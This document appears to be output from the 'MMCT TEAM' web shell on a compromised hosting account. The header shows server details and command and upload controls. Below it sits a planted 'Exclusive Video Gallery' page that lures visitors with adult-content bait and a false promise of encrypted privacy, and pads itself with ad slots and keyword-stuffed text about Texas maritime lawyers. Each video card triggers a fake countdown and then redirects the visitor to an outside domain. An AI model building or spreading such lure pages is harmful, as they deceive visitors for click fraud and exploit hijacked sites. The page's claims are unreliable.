MMCT TEAM
Server IP : 2a02:4780:11:1373:0:3017:be17:10  /  Your IP : 216.73.216.55
Web Server : LiteSpeed
System : Linux in-mum-web1273.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u806862359 ( 806862359)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /var/cache/../www/../../home/u806862359/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //var/cache/../www/../../home/u806862359/public_html/2
<!DOCTYPE html>
<html lang="en">
<head>

<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Exclusive Video Gallery</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}

body {
background: linear-gradient(135deg, #ff69b4 0%, #ff1493 100%);
color: #333;
min-height: 100vh;
padding-bottom: 20px;
}

.container {
max-width: 1200px;
margin: 0 auto;
padding: 0 15px;
}

/* Header */
header {
background: rgba(0, 0, 0, 0.8);
color: white;
text-align: center;
padding: 15px 0;
border-bottom: 3px solid #ff1493;
}

header h1 {
font-size: 28px;
margin: 0;
}

/* Main Content */
.main-content {
display: flex;
flex-direction: column;
align-items: center;
padding: 20px 0;
}

/* Video Gallery */
.video-gallery {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
gap: 20px;
width: 100%;
margin: 20px 0;
}

.video-card {
background: white;
border-radius: 15px;
overflow: hidden;
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.15);
transition: transform 0.3s ease;
cursor: pointer;
}

.video-card:hover {
transform: translateY(-5px) scale(1.02);
}

.video-thumbnail {
width: 100%;
height: 200px;
object-fit: cover;
display: block;
}

.video-info {
padding: 15px;
text-align: center;
}

.video-title {
font-size: 18px;
color: #ff1493;
margin-bottom: 8px;
font-weight: 600;
}

.video-duration {
font-size: 14px;
color: #666;
background: #f0f0f0;
padding: 4px 8px;
border-radius: 12px;
display: inline-block;
}

/* Searching Indicator */
.searching {
background: #ff1493;
color: white;
padding: 12px 20px;
border-radius: 50px;
display: none;
margin: 20px 0;
width: 100%;
max-width: 400px;
text-align: center;
font-weight: 500;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
}

/* Warnings */
.warnings {
display: flex;
flex-wrap: wrap;
justify-content: space-between;
margin: 25px 0;
gap: 10px;
width: 100%;
max-width: 1000px;
}

.warning {
background-color: #fff9c4;
padding: 15px;
border-radius: 10px;
width: 100%;
text-align: left;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.05);
}

.warning.red {
border-left: 4px solid #f44336;
}

.warning.green {
border-left: 4px solid #4caf50;
}

/* About Section */
.about {
background: white;
border-radius: 15px;
padding: 25px;
margin: 20px 0;
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
width: 100%;
max-width: 1000px;
}

.about h2 {
color: #ff1493;
margin-bottom: 15px;
font-size: 24px;
}

.about p {
line-height: 1.6;
margin-bottom: 15px;
color: #555;
}

/* Footer */
footer {
background: rgba(0, 0, 0, 0.8);
color: white;
text-align: center;
padding: 15px 0;
margin-top: 20px;
border-top: 3px solid #ff1493;
}

/* Responsive Design */
@media (min-width: 768px) {
.warnings {
flex-wrap: nowrap;
}

.warning {
width: 32%;
}

.video-gallery {
grid-template-columns: repeat(2, 1fr);
}
}

@media (min-width: 1024px) {
.video-gallery {
grid-template-columns: repeat(3, 1fr);
}
}

@media (max-width: 600px) {
.video-title {
font-size: 16px;
}

.video-thumbnail {
height: 160px;
}
}
</style>
</head>
<body>
<header>
<div class="container">
<h1>Exclusive Video Gallery</h1>
</div>
</header>

<div class="container">
<div class="main-content">
<!-- Video Gallery -->
<div class="video-gallery">
<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image4.webp" alt="Video 1" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 1</div>
<div class="video-duration">10:25</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image3.webp" alt="Video 2" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 2</div>
<div class="video-duration">08:45</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image2.webp" alt="Video 3" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 3</div>
<div class="video-duration">12:30</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image10.webp" alt="Video 4" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 4</div>
<div class="video-duration">09:15</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image9.webp" alt="Video 5" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 5</div>
<div class="video-duration">11:20</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image8.webp" alt="Video 6" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 6</div>
<div class="video-duration">07:50</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image7.webp" alt="Video 7" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 7</div>
<div class="video-duration">14:10</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image6.webp" alt="Video 8" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 8</div>
<div class="video-duration">06:40</div>
</div>
</div>

<div class="video-card" onclick="redirectToVideo()">
<img src="https://webbloggin.online/wp-content/uploads/2025/09/image5.webp" alt="Video 9" class="video-thumbnail">
<div class="video-info">
<div class="video-title">Exclusive Video 9</div>
<div class="video-duration">13:05</div>
</div>
</div>
</div>

<div id="searching" class="searching">Loading video... Please wait</div>

<div class="warnings">
<div class="warning red">✖ Age Restriction<br>You must be 18+ to view this content.</div>
<div class="warning green">✔ Secure Connection<br>Your privacy is protected with encryption.</div>
<div class="warning red">✖ Premium Content<br>Full access requires premium membership.</div>
</div>

<div class="about">
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>
<h1>Maritime Accident Attorney Texas – Protecting Your Rights at Sea</h1>

<p>If you or your loved one has suffered an injury while working offshore, on a vessel, or during maritime operations, you may need the guidance of an experienced <strong>maritime accident attorney in Texas</strong>. Maritime law is highly complex, and accidents at sea require specialized legal representation. A skilled Texas maritime lawyer can help you pursue compensation under the Jones Act, Longshore and Harbor Workers’ Compensation Act, and other maritime laws designed to protect seamen and offshore workers.</p>

<h2>Why You Need a Maritime Accident Attorney in Texas</h2>
<p>Texas is home to some of the busiest ports in the United States, including Houston, Galveston, and Corpus Christi. With thousands of offshore workers, seamen, and dock workers employed in the Gulf of Mexico, maritime accidents are unfortunately common. When injuries occur, companies and insurance providers may try to minimize payouts. This is why hiring a <strong>Texas maritime accident lawyer</strong> is essential. They understand maritime law, investigate the accident thoroughly, and fight for maximum compensation on your behalf.</p>

<h2>Common Types of Maritime Accidents in Texas</h2>
<p>A qualified <strong>maritime injury lawyer in Texas</strong> handles a wide range of cases involving offshore and maritime workers. Some of the most common accidents include:</p>
<ul>
<li>Offshore oil rig accidents</li>
<li>Cargo ship and barge accidents</li>
<li>Fishing vessel injuries</li>
<li>Slip and fall accidents on vessels</li>
<li>Fires, explosions, and chemical exposure</li>
<li>Drowning or man-overboard incidents</li>
</ul>
<p>These accidents can result in serious injuries such as broken bones, spinal cord damage, traumatic brain injuries, and in some cases, wrongful death. A <strong>Texas maritime attorney</strong> can pursue claims for medical expenses, lost wages, pain and suffering, and long-term care.</p>

<h2>Your Rights Under the Jones Act</h2>
<p>One of the most powerful tools for injured seamen is the <strong>Jones Act</strong>. This federal law allows seamen to seek compensation from their employers if negligence or unsafe working conditions caused the accident. A <strong>maritime accident lawyer in Texas</strong> can prove employer negligence and hold companies accountable. In addition, injured maritime workers may also qualify for maintenance and cure benefits, which cover daily living expenses and medical treatment until maximum recovery is reached.</p>

<h2>How a Texas Maritime Attorney Can Help</h2>
<p>When you hire a <strong>maritime accident attorney in Texas</strong>, you gain an advocate who will:</p>
<ul>
<li>Investigate the cause of the accident</li>
<li>Gather evidence and witness statements</li>
<li>Negotiate with employers and insurance companies</li>
<li>File claims under the Jones Act and other maritime laws</li>
<li>Represent you in court if necessary</li>
</ul>
<p>The right lawyer ensures that you receive fair compensation for medical bills, lost income, future earnings, and emotional suffering caused by the accident.</p>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>
<h2>Choosing the Best Maritime Accident Lawyer in Texas</h2>
<p>When selecting a <strong>Texas maritime accident attorney</strong>, look for experience, a proven track record, and knowledge of federal and state maritime laws. Not all personal injury lawyers specialize in maritime cases, so it is important to choose one who focuses specifically on offshore and maritime injuries. The best attorneys offer free consultations and work on a contingency fee basis, meaning you pay nothing unless they win your case.</p>

<h2>Conclusion</h2>
<p>Maritime accidents can be devastating, leaving victims with lifelong injuries and financial burdens. With the help of a skilled <strong>maritime accident attorney in Texas</strong>, you can fight for justice and secure the compensation you deserve. Whether your accident occurred on an oil rig, cargo ship, or fishing vessel, legal help is available. Don’t wait—contact a Texas maritime lawyer today to protect your rights and your future.</p>

</div>
</div>
</div>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>
<footer>
<div class="container">
<p>&copy; 2025 Exclusive Video Gallery. All rights reserved.</p>
</div>
</footer>
<script>
const searchingDiv = document.getElementById('searching');
function redirectToVideo() {
searchingDiv.style.display = 'block';
searchingDiv.textContent = 'Preparing video... Please wait';

let countdown = 3;
const interval = setInterval(() => {
countdown--;
searchingDiv.textContent = `Preparing video... Please wait (${countdown})`;
if (countdown === 0) {
clearInterval(interval);
searchingDiv.style.display = 'none';
// Redirect to your website
window.location.href = 'https://dgmamcgadag.org.in/videocall';
}
}, 1000);
}
</script>
</body>
</html>

MMCT - 2023